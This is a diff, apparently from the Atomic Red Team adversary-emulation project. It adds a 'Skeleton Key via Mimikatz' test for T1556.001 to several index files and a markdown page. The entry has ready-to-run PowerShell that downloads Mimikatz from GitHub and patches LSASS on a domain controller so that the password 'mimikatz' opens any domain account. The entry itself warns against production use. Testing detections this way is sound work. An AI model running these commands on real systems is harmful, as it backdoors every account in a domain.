+    - name: Skeleton Key via Mimikatz
+      auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
+      description: |
+        Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
+        user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
+
+        This test must be run on an isolated domain controller and must not be performed on a production DC.
+        Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
+      supported_platforms:
+      - windows
+      input_arguments:
+        mimikatz_path:
+          type: path
+          default: C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe
+          description: Path to the mimikatz executable
+        file_path:
+          type: path
+          default: C:\ExternalPayloads\Mimikatz\mimikatz.zip
+          description: File path where the zipped mimikatz file is downloaded to
+        mimikatz_url:
+          type: url
+          default: https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
+          description: The URL for the mimikatz release zip
+        directory_path:
+          type: path
+          default: C:\ExternalPayloads\Mimikatz
+          description: Directory path for mimikatz
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Mimikatz must be present on the host machine at
+        prereq_command: 'if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
+          Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
+      executor:
+        command: '& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
+
+          '
+        cleanup_command: |
+          Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
+          Restart-Computer -Force
+        name: powershell
+        elevation_required: true
  T1556.005:
    technique:
      type: attack-pattern
@@ -15154,7 +15154,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -15184,6 +15184,7 @@ defense-evasion:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
+      identifier: T1556.001
    atomic_tests: []
  T1027.006:
    technique:
@@ -39310,7 +39311,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -39340,6 +39341,7 @@ persistence:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
+      identifier: T1556.001
    atomic_tests: []
  T1556.005:
    technique:
@@ -54842,7 +54844,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -54872,6 +54874,7 @@ credential-access:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
+      identifier: T1556.001
    atomic_tests: []
  T1556.005:
    technique:
@@ -13604,7 +13604,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -13634,6 +13634,7 @@ defense-evasion:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
+      identifier: T1556.001
    atomic_tests: []
  T1027.006:
    technique:
@@ -36472,7 +36473,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -36502,6 +36503,7 @@ persistence:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
+      identifier: T1556.001
    atomic_tests: []
  T1556.005:
    technique:
@@ -50461,7 +50463,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -50491,6 +50493,7 @@ credential-access:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
+      identifier: T1556.001
    atomic_tests: []
  T1556.005:
    technique:
@@ -11651,7 +11651,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -11681,6 +11681,7 @@ defense-evasion:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
+      identifier: T1556.001
    atomic_tests: []
  T1027.006:
    technique:
@@ -32249,7 +32250,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -32279,6 +32280,7 @@ persistence:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
+      identifier: T1556.001
    atomic_tests: []
  T1556.005:
    technique:
@@ -44567,7 +44569,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -44597,6 +44599,7 @@ credential-access:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
+      identifier: T1556.001
    atomic_tests: []
  T1556.005:
    technique:
@@ -11470,7 +11470,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -11500,6 +11500,7 @@ defense-evasion:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
+      identifier: T1556.001
    atomic_tests: []
  T1027.006:
    technique:
@@ -32017,7 +32018,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -32047,6 +32048,7 @@ persistence:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
+      identifier: T1556.001
    atomic_tests: []
  T1556.005:
    technique:
@@ -44146,7 +44148,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -44176,6 +44178,7 @@ credential-access:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
+      identifier: T1556.001
    atomic_tests: []
  T1556.005:
    technique:
@@ -22925,7 +22925,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -22955,7 +22955,54 @@ defense-evasion:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
-    atomic_tests: []
+      identifier: T1556.001
+    atomic_tests:
+    - name: Skeleton Key via Mimikatz
+      auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
+      description: |
+        Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
+        user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
+
+        This test must be run on an isolated domain controller and must not be performed on a production DC.
+        Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
+      supported_platforms:
+      - windows
+      input_arguments:
+        mimikatz_path:
+          type: path
+          default: C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe
+          description: Path to the mimikatz executable
+        file_path:
+          type: path
+          default: C:\ExternalPayloads\Mimikatz\mimikatz.zip
+          description: File path where the zipped mimikatz file is downloaded to
+        mimikatz_url:
+          type: url
+          default: https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
+          description: The URL for the mimikatz release zip
+        directory_path:
+          type: path
+          default: C:\ExternalPayloads\Mimikatz
+          description: Directory path for mimikatz
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Mimikatz must be present on the host machine at
+        prereq_command: 'if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
+          Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
+      executor:
+        command: '& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
+
+          '
+        cleanup_command: |
+          Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
+          Restart-Computer -Force
+        name: powershell
+        elevation_required: true
  T1027.006:
    technique:
      type: attack-pattern
@@ -59848,7 +59895,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -59878,7 +59925,54 @@ persistence:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
-    atomic_tests: []
+      identifier: T1556.001
+    atomic_tests:
+    - name: Skeleton Key via Mimikatz
+      auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
+      description: |
+        Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
+        user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
+
+        This test must be run on an isolated domain controller and must not be performed on a production DC.
+        Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
+      supported_platforms:
+      - windows
+      input_arguments:
+        mimikatz_path:
+          type: path
+          default: C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe
+          description: Path to the mimikatz executable
+        file_path:
+          type: path
+          default: C:\ExternalPayloads\Mimikatz\mimikatz.zip
+          description: File path where the zipped mimikatz file is downloaded to
+        mimikatz_url:
+          type: url
+          default: https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
+          description: The URL for the mimikatz release zip
+        directory_path:
+          type: path
+          default: C:\ExternalPayloads\Mimikatz
+          description: Directory path for mimikatz
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Mimikatz must be present on the host machine at
+        prereq_command: 'if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
+          Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
+      executor:
+        command: '& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
+
+          '
+        cleanup_command: |
+          Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
+          Restart-Computer -Force
+        name: powershell
+        elevation_required: true
  T1556.005:
    technique:
      type: attack-pattern
@@ -79805,7 +79899,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -79835,7 +79929,54 @@ credential-access:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
-    atomic_tests: []
+      identifier: T1556.001
+    atomic_tests:
+    - name: Skeleton Key via Mimikatz
+      auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
+      description: |
+        Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
+        user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
+
+        This test must be run on an isolated domain controller and must not be performed on a production DC.
+        Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
+      supported_platforms:
+      - windows
+      input_arguments:
+        mimikatz_path:
+          type: path
+          default: C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe
+          description: Path to the mimikatz executable
+        file_path:
+          type: path
+          default: C:\ExternalPayloads\Mimikatz\mimikatz.zip
+          description: File path where the zipped mimikatz file is downloaded to
+        mimikatz_url:
+          type: url
+          default: https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
+          description: The URL for the mimikatz release zip
+        directory_path:
+          type: path
+          default: C:\ExternalPayloads\Mimikatz
+          description: Directory path for mimikatz
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Mimikatz must be present on the host machine at
+        prereq_command: 'if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
+          Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
+      executor:
+        command: '& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
+
+          '
+        cleanup_command: |
+          Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
+          Restart-Computer -Force
+        name: powershell
+        elevation_required: true
  T1556.005:
    technique:
      type: attack-pattern
@@ -0,0 +1,66 @@
+# T1556.001 - Modify Authentication Process: Domain Controller Authentication
+
+## Description from ATT&CK
+
+> Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts.
+> 
+> Malware may be used to inject false credentials into the authentication process on a domain controller with the intent of creating a backdoor used to access any user’s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once patched, an adversary can use the injected password to successfully authenticate as any domain user account (until the the skeleton key is erased from memory by a reboot of the domain controller). Authenticated access may enable unfettered access to hosts and/or resources within single-factor authentication environments.(Citation: Dell Skeleton)
+
+[Source](https://attack.mitre.org/techniques/T1556/001)
+
+## Atomic Tests
+
+- [Atomic Test #1: Skeleton Key via Mimikatz](#atomic-test-1-skeleton-key-via-mimikatz)
+
+### Atomic Test #1: Skeleton Key via Mimikatz
+
+Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
+user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
+
+This test must be run on an isolated domain controller and must not be performed on a production DC.
+Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
+
+**Supported Platforms:** Windows
+
+**auto_generated_guid:** `0ee8081f-e9a7-4a2e-a23f-68473023184f`
+
+#### Inputs
+
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| mimikatz_path | Path to the mimikatz executable | path | C:&#92;ExternalPayloads&#92;Mimikatz&#92;x64&#92;mimikatz.exe|
+| file_path | File path where the zipped mimikatz file is downloaded to | path | C:&#92;ExternalPayloads&#92;Mimikatz&#92;mimikatz.zip|
+| mimikatz_url | The URL for the mimikatz release zip | url | https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip|
+| directory_path | Directory path for mimikatz | path | C:&#92;ExternalPayloads&#92;Mimikatz|
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+```powershell
+& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
+```
+
+#### Cleanup Commands
+
+```powershell
+Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
+Restart-Computer -Force
+```
+
+#### Dependencies: Run with `powershell`!
+
+##### Description: Mimikatz must be present on the host machine at
+
+###### Check Prereq Commands
+
+```powershell
+if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
+```
+
+###### Get Prereq Commands
+
+```powershell
+New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
+Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
+Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
+```
+
@@ -2,6 +2,7 @@ attack_technique: T1556.001
 display_name: 'Modify Authentication Process: Domain Controller Authentication'
 atomic_tests:
 - name: Skeleton Key via Mimikatz
+  auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
  description: |
    Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
    user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
@@ -1800,3 +1800,4 @@ c7be89f7-5d06-4321-9f90-8676a77e0502
 4608bc1b-e682-466b-a7d7-dbd76760db31
 6683baf0-6e77-4f58-b114-814184ea8150
 c2ca068a-eb1e-498f-9f93-3d554c455916
+0ee8081f-e9a7-4a2e-a23f-68473023184f